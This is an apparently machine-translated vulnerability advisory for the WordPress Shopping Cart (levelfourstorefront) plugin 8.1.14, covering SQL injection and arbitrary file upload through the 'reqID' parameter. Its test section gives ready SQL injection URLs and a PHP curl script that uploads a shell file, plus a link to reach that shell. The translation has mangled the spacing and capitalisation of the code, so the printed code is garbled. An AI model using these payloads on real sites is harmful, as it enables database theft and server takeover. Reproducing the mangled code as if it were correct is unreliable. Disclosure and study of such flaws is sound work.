Release date:
Updated on:
Affected Systems:
WordPress Shopping Cart 8.1.14
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57101
The WordPress Shopping Cart plug-in is a Shopping Cart system that provides electronic trading functions and management tools.
The WordPress Shopping Cart plug-in has a security vulnerability and does not properly verify wp-content/plugins/levelfourstorefront/scripts/administration/backup. php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript. php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts. php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers. the validity of the "reqID" parameter value in php can lead to arbitrary SQL code execution and arbitrary file upload.
<* Source: Sammy Forgit
Link: http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
Http://www.securelist.com/en/advisories/51690
Http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit SQL injection:
Database Wordpress:
Http: // localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup. php? ReqID = 1 'or 1 = '1
Account XLS:
Http: // localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts. php? ReqID = 1 'or 1 = '1
Subscriber XLS:
Http: // localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers. php? ReqID = 1 'or 1 = '1
# Exploit Arbitrary File Upload:
PostShell. php
<? Php
$ Uploadfile = "lo. php ";
$ Force = "http: // localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript. php ";
$ Ch = curl_init ("$ force ");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS,
Array ('filedata' => "@ $ uploadfile ",
'Reqid' => "1 'or 1 = '1 "));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 );
$ PostResult = curl_exec ($ ch );
Curl_close ($ ch );
Print "$ postResult ";
?>
Shell Access:
Http: // localhost/wordpress/wp-content/plugins/levelfourstorefront/products/lo. php
Lo. php
<? Php
Phpinfo ();
?>
# Site: 1337day.com Inj3ct0r Exploit Database
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://wordpress.org/extend/plugins/levelfourstorefront/